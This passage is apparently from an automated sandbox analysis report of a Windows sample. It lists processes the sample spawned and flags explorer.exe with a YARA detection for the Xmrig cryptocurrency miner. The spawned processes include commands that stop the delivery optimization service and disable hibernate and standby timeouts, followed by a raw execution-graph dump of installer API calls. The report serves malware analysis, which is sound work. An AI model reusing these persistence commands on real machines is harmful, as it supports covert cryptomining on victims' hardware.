                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:58
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:59
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:60
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:61
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:62
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:63
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:64
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:65
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  Imagebase:0x7ff69f830000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:66
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:67
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:68
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:69
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:explorer.exe
                                                  Imagebase:0x7ff72b770000
                                                  File size:5'141'208 bytes
                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Has exited:false


                                                    Execution Graph

                                                    Execution Coverage:13.5%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:16.6%
                                                    Total number of Nodes:1315
                                                    Total number of Limit Nodes:17
calls 3535->3536 3537 401960 3536->3537 3538 402bac 17 API calls 3537->3538 3539 40196d 3538->3539 3540 402bce 17 API calls 3539->3540 3541 401984 lstrlenA 3540->3541 3543 401994 3541->3543 3542 4019d4 3543->3542 3547 4060f7 lstrcpynA 3543->3547 3545 4019c4 3545->3542 3546 4019c9 lstrlenA 3545->3546 3546->3542 3547->3545 3548 40535c 3549 405507 3548->3549 3550 40537e GetDlgItem GetDlgItem GetDlgItem 3548->3550 3552 40550f GetDlgItem CreateThread CloseHandle 3549->3552 3555 405537 3549->3555 3593 4041b0 SendMessageA 3550->3593 3552->3555 3553 4053ee 3560 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3553->3560 3554 405565 3558 4055c0 3554->3558 3562 405575 3554->3562 3563 405599 ShowWindow 3554->3563 3555->3554 3556 405586 3555->3556 3557 40554d ShowWindow ShowWindow 3555->3557 3559 4041e2 8 API calls 3556->3559 3595 4041b0 SendMessageA 3557->3595 3558->3556 3569 4055cd SendMessageA 3558->3569 3564 405592 3559->3564 3567 405463 3560->3567 3568 405447 SendMessageA SendMessageA 3560->3568 3596 404154 3562->3596 3565 4055b9 3563->3565 3566 4055ab 3563->3566 3572 404154 SendMessageA 3565->3572 3571 40521e 24 API calls 3566->3571 3573 405476 3567->3573 3574 405468 SendMessageA 3567->3574 3568->3567 3569->3564 3575 4055e6 CreatePopupMenu 3569->3575 3571->3565 3572->3558 3577 40417b 18 API calls 3573->3577 3574->3573 3576 40618a 17 API calls 3575->3576 3578 4055f6 AppendMenuA 3576->3578 3579 405486 3577->3579 3580 405614 GetWindowRect 3578->3580 3581 405627 TrackPopupMenu 3578->3581 3582 4054c3 GetDlgItem SendMessageA 3579->3582 3583 40548f ShowWindow 3579->3583 3580->3581 3581->3564 3584 405643 3581->3584 3582->3564 3587 4054ea SendMessageA SendMessageA 3582->3587 3585 4054b2 3583->3585 3586 4054a5 ShowWindow 3583->3586 3588 405662 SendMessageA 3584->3588 3594 4041b0 SendMessageA 3585->3594 3586->3585 3587->3564 3588->3588 3589 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3588->3589 3591 4056a1 SendMessageA 3589->3591 3591->3591 3592 4056c3 
GlobalUnlock SetClipboardData CloseClipboard 3591->3592 3592->3564 3593->3553 3594->3582 3595->3554 3597 404161 SendMessageA 3596->3597 3598 40415b 3596->3598 3597->3556 3598->3597 3599 40275d 3600 402763 3599->3600 3601 402a5a 3600->3601 3602 40276b FindClose 3600->3602 3602->3601 3603 40495e 3604 40498a 3603->3604 3605 40496e 3603->3605 3607 404990 SHGetPathFromIDListA 3604->3607 3608 4049bd 3604->3608 3614 4057f7 GetDlgItemTextA 3605->3614 3610 4049a0 3607->3610 3611 4049a7 SendMessageA 3607->3611 3609 40497b SendMessageA 3609->3604 3612 40140b 2 API calls 3610->3612 3611->3608 3612->3611 3614->3609 3615 401a5e 3616 402bac 17 API calls 3615->3616 3617 401a67 3616->3617 3618 402bac 17 API calls 3617->3618 3619 401a0e 3618->3619 3620 4029de 3621 406500 5 API calls 3620->3621 3622 4029e5 3621->3622 3623 402bce 17 API calls 3622->3623 3624 4029ee 3623->3624 3626 402a2a 3624->3626 3630 40614a 3624->3630 3627 4029fc 3627->3626 3634 406134 3627->3634 3631 406155 3630->3631 3632 406178 IIDFromString 3631->3632 3633 406171 3631->3633 3632->3627 3633->3627 3637 406119 WideCharToMultiByte 3634->3637 3636 402a1d CoTaskMemFree 3636->3626 3637->3636 3638 4027df 3639 402bce 17 API calls 3638->3639 3641 4027ed 3639->3641 3640 402803 3643 405c6b 2 API calls 3640->3643 3641->3640 3642 402bce 17 API calls 3641->3642 3642->3640 3644 402809 3643->3644 3666 405c90 GetFileAttributesA CreateFileA 3644->3666 3646 402816 3647 402822 GlobalAlloc 3646->3647 3648 4028bf 3646->3648 3649 4028b6 CloseHandle 3647->3649 3650 40283b 3647->3650 3651 4028c7 DeleteFileA 3648->3651 3652 4028da 3648->3652 3649->3648 3667 403300 SetFilePointer 3650->3667 3651->3652 3654 402841 3655 4032ea ReadFile 3654->3655 3656 40284a GlobalAlloc 3655->3656 3657 402894 3656->3657 3658 40285a 3656->3658 3659 405d37 WriteFile 3657->3659 3660 4030d8 31 API calls 3658->3660 3661 4028a0 GlobalFree 3659->3661 3663 402867 3660->3663 3662 4030d8 31 API calls 3661->3662 3664 4028b3 3662->3664 3665 40288b GlobalFree 3663->3665 
3664->3649 3665->3657 3666->3646 3667->3654 3668 4023e0 3669 402bce 17 API calls 3668->3669 3670 4023f1 3669->3670 3671 402bce 17 API calls 3670->3671 3672 4023fa 3671->3672 3673 402bce 17 API calls 3672->3673 3674 402404 GetPrivateProfileStringA 3673->3674 3675 4028e0 3676 402bac 17 API calls 3675->3676 3677 4028e6 3676->3677 3678 402925 3677->3678 3679 40290e 3677->3679 3684 4027bf 3677->3684 3682 40293f 3678->3682 3683 40292f 3678->3683 3680 402922 3679->3680 3681 402913 3679->3681 3680->3684 3690 406055 wsprintfA 3680->3690 3689 4060f7 lstrcpynA 3681->3689 3686 40618a 17 API calls 3682->3686 3685 402bac 17 API calls 3683->3685 3685->3680 3686->3680 3689->3684 3690->3684 3691 401b63 3692 402bce 17 API calls 3691->3692 3693 401b6a 3692->3693 3694 402bac 17 API calls 3693->3694 3695 401b73 wsprintfA 3694->3695 3696 402a5a 3695->3696 3697 401d65 3698 401d78 GetDlgItem 3697->3698 3699 401d6b 3697->3699 3701 401d72 3698->3701 3700 402bac 17 API calls 3699->3700 3700->3701 3702 401db9 GetClientRect LoadImageA SendMessageA 3701->3702 3703 402bce 17 API calls 3701->3703 3705 401e1a 3702->3705 3707 401e26 3702->3707 3703->3702 3706 401e1f DeleteObject 3705->3706 3705->3707 3706->3707 3708 4042e6 3709 4042fc 3708->3709 3714 404408 3708->3714 3712 40417b 18 API calls 3709->3712 3710 404477 3711 404541 3710->3711 3713 404481 GetDlgItem 3710->3713 3720 4041e2 8 API calls 3711->3720 3715 404352 3712->3715 3716 404497 3713->3716 3717 4044ff 3713->3717 3714->3710 3714->3711 3718 40444c GetDlgItem SendMessageA 3714->3718 3719 40417b 18 API calls 3715->3719 3716->3717 3724 4044bd SendMessageA LoadCursorA SetCursor 3716->3724 3717->3711 3721 404511 3717->3721 3741 40419d EnableWindow 3718->3741 3723 40435f CheckDlgButton 3719->3723 3731 40453c 3720->3731 3726 404517 SendMessageA 3721->3726 3727 404528 3721->3727 3739 40419d EnableWindow 3723->3739 3745 40458a 3724->3745 3726->3727 3727->3731 3732 40452e SendMessageA 3727->3732 3728 404472 3742 404566 3728->3742 3732->3731 3734 
40437d GetDlgItem 3740 4041b0 SendMessageA 3734->3740 3736 404393 SendMessageA 3737 4043b1 GetSysColor 3736->3737 3738 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3736->3738 3737->3738 3738->3731 3739->3734 3740->3736 3741->3728 3743 404574 3742->3743 3744 404579 SendMessageA 3742->3744 3743->3744 3744->3710 3748 4057d9 ShellExecuteExA 3745->3748 3747 4044f0 LoadCursorA SetCursor 3747->3717 3748->3747 3749 40166a 3750 402bce 17 API calls 3749->3750 3751 401671 3750->3751 3752 402bce 17 API calls 3751->3752 3753 40167a 3752->3753 3754 402bce 17 API calls 3753->3754 3755 401683 MoveFileA 3754->3755 3756 401696 3755->3756 3757 40168f 3755->3757 3758 40646b 2 API calls 3756->3758 3761 4022e2 3756->3761 3759 401423 24 API calls 3757->3759 3760 4016a5 3758->3760 3759->3761 3760->3761 3762 405ed6 36 API calls 3760->3762 3762->3757 3763 40216b 3764 402bce 17 API calls 3763->3764 3765 402172 3764->3765 3766 402bce 17 API calls 3765->3766 3767 40217c 3766->3767 3768 402bce 17 API calls 3767->3768 3769 402186 3768->3769 3770 402bce 17 API calls 3769->3770 3771 402193 3770->3771 3772 402bce 17 API calls 3771->3772 3773 40219d 3772->3773 3774 4021df CoCreateInstance 3773->3774 3775 402bce 17 API calls 3773->3775 3778 4021fe 3774->3778 3780 4022ac 3774->3780 3775->3774 3776 401423 24 API calls 3777 4022e2 3776->3777 3779 40228c MultiByteToWideChar 3778->3779 3778->3780 3779->3780 3780->3776 3780->3777 3781 4022eb 3782 402bce 17 API calls 3781->3782 3783 4022f1 3782->3783 3784 402bce 17 API calls 3783->3784 3785 4022fa 3784->3785 3786 402bce 17 API calls 3785->3786 3787 402303 3786->3787 3788 40646b 2 API calls 3787->3788 3789 40230c 3788->3789 3790 40231d lstrlenA lstrlenA 3789->3790 3794 402310 3789->3794 3792 40521e 24 API calls 3790->3792 3791 40521e 24 API calls 3795 402318 3791->3795 3793 402359 SHFileOperationA 3792->3793 3793->3794 3793->3795 3794->3791 3794->3795 3796 40236d 3797 402374 3796->3797 3801 402387 3796->3801 3798 40618a 17 API calls 
3797->3798 3799 402381 3798->3799 3800 405813 MessageBoxIndirectA 3799->3800 3800->3801 3802 40266d 3803 402bac 17 API calls 3802->3803 3804 402677 3803->3804 3805 405d08 ReadFile 3804->3805 3806 4026e7 3804->3806 3808 4026f7 3804->3808 3810 4026e5 3804->3810 3805->3804 3811 406055 wsprintfA 3806->3811 3809 40270d SetFilePointer 3808->3809 3808->3810 3809->3810 3811->3810 3812 4019ed 3813 402bce 17 API calls 3812->3813 3814 4019f4 3813->3814 3815 402bce 17 API calls 3814->3815 3816 4019fd 3815->3816 3817 401a04 lstrcmpiA 3816->3817 3818 401a16 lstrcmpA 3816->3818 3819 401a0a 3817->3819 3818->3819 3820 40296e 3821 402bac 17 API calls 3820->3821 3822 402974 3821->3822 3823 4029af 3822->3823 3825 4027bf 3822->3825 3826 402986 3822->3826 3824 40618a 17 API calls 3823->3824 3823->3825 3824->3825 3826->3825 3828 406055 wsprintfA 3826->3828 3828->3825 3829 4014f4 SetForegroundWindow 3830 402a5a 3829->3830 3831 402476 3832 402bce 17 API calls 3831->3832 3833 402488 3832->3833 3834 402bce 17 API calls 3833->3834 3835 402492 3834->3835 3848 402c5e 3835->3848 3838 402a5a 3839 4024c7 3841 4024d3 3839->3841 3844 402bac 17 API calls 3839->3844 3840 402bce 17 API calls 3843 4024c0 lstrlenA 3840->3843 3842 4024f5 RegSetValueExA 3841->3842 3845 4030d8 31 API calls 3841->3845 3846 40250b RegCloseKey 3842->3846 3843->3839 3844->3841 3845->3842 3846->3838 3849 402c79 3848->3849 3852 405fab 3849->3852 3853 405fba 3852->3853 3854 4024a2 3853->3854 3855 405fc5 RegCreateKeyExA 3853->3855 3854->3838 3854->3839 3854->3840 3855->3854 3856 402777 3857 40277d 3856->3857 3858 402781 FindNextFileA 3857->3858 3860 402793 3857->3860 3859 4027d2 3858->3859 3858->3860 3862 4060f7 lstrcpynA 3859->3862 3862->3860 3863 401ef9 3864 402bce 17 API calls 3863->3864 3865 401eff 3864->3865 3866 402bce 17 API calls 3865->3866 3867 401f08 3866->3867 3868 402bce 17 API calls 3867->3868 3869 401f11 3868->3869 3870 402bce 17 API calls 3869->3870 3871 401f1a 3870->3871 3872 401423 24 API calls 3871->3872 3873 
401f21 3872->3873 3880 4057d9 ShellExecuteExA 3873->3880 3875 401f5c 3876 406575 5 API calls 3875->3876 3877 4027bf 3875->3877 3878 401f76 CloseHandle 3876->3878 3878->3877 3880->3875 3422 401f7b 3423 402bce 17 API calls 3422->3423 3424 401f81 3423->3424 3425 40521e 24 API calls 3424->3425 3426 401f8b 3425->3426 3427 405796 2 API calls 3426->3427 3428 401f91 3427->3428 3429 401fb2 CloseHandle 3428->3429 3433 4027bf 3428->3433 3437 406575 WaitForSingleObject 3428->3437 3429->3433 3432 401fa6 3434 401fb4 3432->3434 3435 401fab 3432->3435 3434->3429 3442 406055 wsprintfA 3435->3442 3438 40658f 3437->3438 3439 4065a1 GetExitCodeProcess 3438->3439 3440 40653c 2 API calls 3438->3440 3439->3432 3441 406596 WaitForSingleObject 3440->3441 3441->3438 3442->3429 3881 401ffb 3882 402bce 17 API calls 3881->3882 3883 402002 3882->3883 3884 406500 5 API calls 3883->3884 3885 402011 3884->3885 3886 402029 GlobalAlloc 3885->3886 3887 402091 3885->3887 3886->3887 3888 40203d 3886->3888 3889 406500 5 API calls 3888->3889 3890 402044 3889->3890 3891 406500 5 API calls 3890->3891 3892 40204e 3891->3892 3892->3887 3896 406055 wsprintfA 3892->3896 3894 402085 3897 406055 wsprintfA 3894->3897 3896->3894 3897->3887 3898 4018fd 3899 401934 3898->3899 3900 402bce 17 API calls 3899->3900 3901 401939 3900->3901 3902 4058bf 67 API calls 3901->3902 3903 401942 3902->3903 3904 401000 3905 401037 BeginPaint GetClientRect 3904->3905 3906 40100c DefWindowProcA 3904->3906 3908 4010f3 3905->3908 3911 401179 3906->3911 3909 401073 CreateBrushIndirect FillRect DeleteObject 3908->3909 3910 4010fc 3908->3910 3909->3908 3912 401102 CreateFontIndirectA 3910->3912 3913 401167 EndPaint 3910->3913 3912->3913 3914 401112 6 API calls 3912->3914 3913->3911 3914->3913 3915 401900 3916 402bce 17 API calls 3915->3916 3917 401907 3916->3917 3918 405813 MessageBoxIndirectA 3917->3918 3919 401910 3918->3919 3920 404b80 GetDlgItem GetDlgItem 3921 404bd6 7 API calls 3920->3921 3928 404dfd 3920->3928 3922 404c72 
SendMessageA 3921->3922 3923 404c7e DeleteObject 3921->3923 3922->3923 3924 404c89 3923->3924 3926 404cc0 3924->3926 3929 40618a 17 API calls 3924->3929 3925 404edf 3927 404f8b 3925->3927 3937 404f38 SendMessageA 3925->3937 3963 404df0 3925->3963 3930 40417b 18 API calls 3926->3930 3933 404f95 SendMessageA 3927->3933 3934 404f9d 3927->3934 3928->3925 3932 404e6c 3928->3932 3974 404ace SendMessageA 3928->3974 3935 404ca2 SendMessageA SendMessageA 3929->3935 3931 404cd4 3930->3931 3936 40417b 18 API calls 3931->3936 3932->3925 3938 404ed1 SendMessageA 3932->3938 3933->3934 3944 404fb6 3934->3944 3945 404faf ImageList_Destroy 3934->3945 3949 404fc6 3934->3949 3935->3924 3952 404ce5 3936->3952 3942 404f4d SendMessageA 3937->3942 3937->3963 3938->3925 3939 4041e2 8 API calls 3943 40518b 3939->3943 3941 40513f 3950 405151 ShowWindow GetDlgItem ShowWindow 3941->3950 3941->3963 3948 404f60 3942->3948 3946 404fbf GlobalFree 3944->3946 3944->3949 3945->3944 3946->3949 3947 404dbf GetWindowLongA SetWindowLongA 3951 404dd8 3947->3951 3957 404f71 SendMessageA 3948->3957 3949->3941 3967 405001 3949->3967 3979 404b4e 3949->3979 3950->3963 3953 404df5 3951->3953 3954 404ddd ShowWindow 3951->3954 3952->3947 3956 404d37 SendMessageA 3952->3956 3958 404dba 3952->3958 3960 404d75 SendMessageA 3952->3960 3961 404d89 SendMessageA 3952->3961 3973 4041b0 SendMessageA 3953->3973 3972 4041b0 SendMessageA 3954->3972 3956->3952 3957->3927 3958->3947 3958->3951 3960->3952 3961->3952 3963->3939 3964 40510b 3965 405115 InvalidateRect 3964->3965 3968 405121 3964->3968 3965->3968 3966 40502f SendMessageA 3969 405045 3966->3969 3967->3966 3967->3969 3968->3941 3988 404a89 3968->3988 3969->3964 3971 4050b9 SendMessageA SendMessageA 3969->3971 3971->3969 3972->3963 3973->3928 3975 404af1 GetMessagePos ScreenToClient SendMessageA 3974->3975 3976 404b2d SendMessageA 3974->3976 3977 404b25 3975->3977 3978 404b2a 3975->3978 3976->3977 3977->3932 3978->3976 3991 4060f7 lstrcpynA 3979->3991 3981 404b61 
3992 406055 wsprintfA 3981->3992 3983 404b6b 3984 40140b 2 API calls 3983->3984 3985 404b74 3984->3985 3993 4060f7 lstrcpynA 3985->3993 3987 404b7b 3987->3967 3994 4049c4 3988->3994 3990 404a9e 3990->3941 3991->3981 3992->3983 3993->3987 3995 4049da 3994->3995 3996 40618a 17 API calls 3995->3996 3997 404a3e 3996->3997 3998 40618a 17 API calls 3997->3998 3999 404a49 3998->3999 4000 40618a 17 API calls 3999->4000 4001 404a5f lstrlenA wsprintfA SetDlgItemTextA 4000->4001 4001->3990 4002 401502 4003 40150a 4002->4003 4005 40151d 4002->4005 4004 402bac 17 API calls 4003->4004 4004->4005 4006 402604 4007 402bce 17 API calls 4006->4007 4008 40260b 4007->4008 4011 405c90 GetFileAttributesA CreateFileA 4008->4011 4010 402617 4011->4010 4012 401b87 4013 401b94 4012->4013 4014 401bd8 4012->4014 4015 401c1c 4013->4015 4020 401bab 4013->4020 4016 401c01 GlobalAlloc 4014->4016 4017 401bdc 4014->4017 4018 40618a 17 API calls 4015->4018 4026 402387 4015->4026 4019 40618a 17 API calls 4016->4019 4017->4026 4033 4060f7 lstrcpynA 4017->4033 4022 402381 4018->4022 4019->4015 4031 4060f7 lstrcpynA 4020->4031 4027 405813 MessageBoxIndirectA 4022->4027 4024 401bee GlobalFree 4024->4026 4025 401bba 4032 4060f7 lstrcpynA 4025->4032 4027->4026 4029 401bc9 4034 4060f7 lstrcpynA 4029->4034 4031->4025 4032->4029 4033->4024 4034->4026 4035 402588 4045 402c0e 4035->4045 4038 402bac 17 API calls 4039 40259b 4038->4039 4040 4027bf 4039->4040 4041 4025c2 RegEnumValueA 4039->4041 4042 4025b6 RegEnumKeyA 4039->4042 4043 4025d7 RegCloseKey 4041->4043 4042->4043 4043->4040 4046 402bce 17 API calls 4045->4046 4047 402c25 4046->4047 4048 405f7d RegOpenKeyExA 4047->4048 4049 402592 4048->4049 4049->4038 3418 401389 3420 401390 3418->3420 3419 4013fe 3420->3419 3421 4013cb MulDiv SendMessageA 3420->3421 3421->3420 4050 40460d 4051 404639 4050->4051 4052 40464a 4050->4052 4111 4057f7 GetDlgItemTextA 4051->4111 4054 404656 GetDlgItem 4052->4054 4087 4046b5 4052->4087 4058 40466a 4054->4058 4055 404644 4057 
4063d2 5 API calls 4055->4057 4056 404799 4059 404943 4056->4059 4113 4057f7 GetDlgItemTextA 4056->4113 4057->4052 4061 40467e SetWindowTextA 4058->4061 4066 405b28 4 API calls 4058->4066 4065 4041e2 8 API calls 4059->4065 4064 40417b 18 API calls 4061->4064 4062 4047c9 4067 405b7d 18 API calls 4062->4067 4063 40618a 17 API calls 4068 404729 SHBrowseForFolderA 4063->4068 4069 40469a 4064->4069 4070 404957 4065->4070 4071 404674 4066->4071 4072 4047cf 4067->4072 4068->4056 4073 404741 CoTaskMemFree 4068->4073 4074 40417b 18 API calls 4069->4074 4071->4061 4075 405a8f 3 API calls 4071->4075 4114 4060f7 lstrcpynA 4072->4114 4076 405a8f 3 API calls 4073->4076 4077 4046a8 4074->4077 4075->4061 4078 40474e 4076->4078 4112 4041b0 SendMessageA 4077->4112 4081 404785 SetDlgItemTextA 4078->4081 4086 40618a 17 API calls 4078->4086 4081->4056 4082 4046ae 4084 406500 5 API calls 4082->4084 4083 4047e6 4085 406500 5 API calls 4083->4085 4084->4087 4094 4047ed 4085->4094 4088 40476d lstrcmpiA 4086->4088 4087->4056 4087->4059 4087->4063 4088->4081 4091 40477e lstrcatA 4088->4091 4089 404829 4115 4060f7 lstrcpynA 4089->4115 4091->4081 4092 404830 4093 405b28 4 API calls 4092->4093 4095 404836 GetDiskFreeSpaceA 4093->4095 4094->4089 4097 405ad6 2 API calls 4094->4097 4099 404881 4094->4099 4098 40485a MulDiv 4095->4098 4095->4099 4097->4094 4098->4099 4100 4048f2 4099->4100 4101 404a89 20 API calls 4099->4101 4102 404915 4100->4102 4103 40140b 2 API calls 4100->4103 4104 4048df 4101->4104 4116 40419d EnableWindow 4102->4116 4103->4102 4106 4048f4 SetDlgItemTextA 4104->4106 4107 4048e4 4104->4107 4106->4100 4109 4049c4 20 API calls 4107->4109 4108 404931 4108->4059 4110 404566 SendMessageA 4108->4110 4109->4100 4110->4059 4111->4055 4112->4082 4113->4062 4114->4083 4115->4092 4116->4108 4117 401490 4118 40521e 24 API calls 4117->4118 4119 401497 4118->4119 4120 405192 4121 4051a2 4120->4121 4122 4051b6 4120->4122 4124 4051ff 4121->4124 4125 4051a8 4121->4125 4123 4051be 
IsWindowVisible 4122->4123 4131 4051d5 4122->4131 4123->4124 4126 4051cb 4123->4126 4127 405204 CallWindowProcA 4124->4127 4128 4041c7 SendMessageA 4125->4128 4130 404ace 5 API calls 4126->4130 4129 4051b2 4127->4129 4128->4129 4130->4131 4131->4127 4132 404b4e 4 API calls 4131->4132 4132->4124 4133 402516 4134 402c0e 17 API calls 4133->4134 4135 402520 4134->4135 4136 402bce 17 API calls 4135->4136 4137 402529 4136->4137 4138 402533 RegQueryValueExA 4137->4138 4142 4027bf 4137->4142 4139 402559 RegCloseKey 4138->4139 4140 402553 4138->4140 4139->4142 4140->4139 4144 406055 wsprintfA 4140->4144 4144->4139 4145 40239c 4146 4023a4 4145->4146 4147 4023aa 4145->4147 4148 402bce 17 API calls 4146->4148 4149 402bce 17 API calls 4147->4149 4151 4023ba 4147->4151 4148->4147 4149->4151 4150 4023c8 4153 402bce 17 API calls 4150->4153 4151->4150 4152 402bce 17 API calls 4151->4152 4152->4150 4154 4023d1 WritePrivateProfileStringA 4153->4154 4155 40149d 4156 402387 4155->4156 4157 4014ab PostQuitMessage 4155->4157 4157->4156 4158 40159d 4159 402bce 17 API calls 4158->4159 4160 4015a4 SetFileAttributesA 4159->4160 4161 4015b6 4160->4161 4162 40209d 4163 40215d 4162->4163 4164 4020af 4162->4164 4167 401423 24 API calls 4163->4167 4165 402bce 17 API calls 4164->4165 4166 4020b6 4165->4166 4168 402bce 17 API calls 4166->4168 4172 4022e2 4167->4172 4169 4020bf 4168->4169 4170 4020d4 LoadLibraryExA 4169->4170 4171 4020c7 GetModuleHandleA 4169->4171 4170->4163 4173 4020e4 GetProcAddress 4170->4173 4171->4170 4171->4173 4174 402130 4173->4174 4175 4020f3 4173->4175 4176 40521e 24 API calls 4174->4176 4177 402103 4175->4177 4178 401423 24 API calls 4175->4178 4176->4177 4177->4172 4179 402151 FreeLibrary 4177->4179 4178->4177 4179->4172 4180 401a1e 4181 402bce 17 API calls 4180->4181 4182 401a27 ExpandEnvironmentStringsA 4181->4182 4183 401a3b 4182->4183 4185 401a4e 4182->4185 4184 401a40 lstrcmpA 4183->4184 4183->4185 4184->4185 4191 40171f 4192 402bce 17 API calls 4191->4192 4193 
